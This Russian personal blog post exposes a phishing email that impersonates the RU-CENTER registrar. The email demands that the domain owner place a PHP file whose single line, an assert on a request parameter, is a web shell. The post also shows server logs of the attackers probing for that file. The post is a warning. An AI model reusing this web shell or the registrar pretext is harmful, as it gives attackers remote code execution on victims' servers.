Пришло письмо, якобы от RU-CENTER
Уважаемый администратор домена!
В соответствии с поправками, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменным именем ***.ru осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете возможность управлять доменом, создайте в корневой директории сайта файл *****.php со следующим содержимым:
assert(stripslashes($_REQUEST[RUCENTER]));
?>
Файл должен быть создан в течение трех рабочих дней с момента получения настоящего сообщения и находиться на сервере до 19 августа 2017 года, 15:00 (UTC+03:00), в противном случае процедура активации будет считаться непройденной.
Уведомляем Вас о том, что если процедура подтверждения не будет пройдена, обслуживание домена будет приостановлено.
Письмо я прочитал слишком поздно, а то бы и вправду создал этот файл. Естественно, с другим кодом, чтобы записать, какие запросы эти хакеры в него будут посылать, а не позволять им читать и писать файлы у меня на сервере, и выполнять прочие команды.
Сейчас посмотрел в логи, они и вправду пытались в него зайти вплоть до 19 августа, как и обещали:
13.59.87.172 - - [07/Aug/2017:15:04:08 +0100] "POST /*****.php HTTP/1.1" 404 218 "-" "Mozilla/5.0 (X11; ; Linux i686; rv:1.9.2.20) Gecko/20110805"
13.59.87.172 - - [10/Aug/2017:16:36:36 +0100] "POST /*****.php HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13"
54.215.228.151 - - [19/Aug/2017:12:13:41 +0100] "POST /*****.php HTTP/1.1" 404 218 "-" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
А вот где они украли мой адрес - непонятно, nic.ru в whois про меня ничего не показывает, просто Private person.
Оригинал этой записи в личном блоге.
(
| Комментировать в Dreamwidth)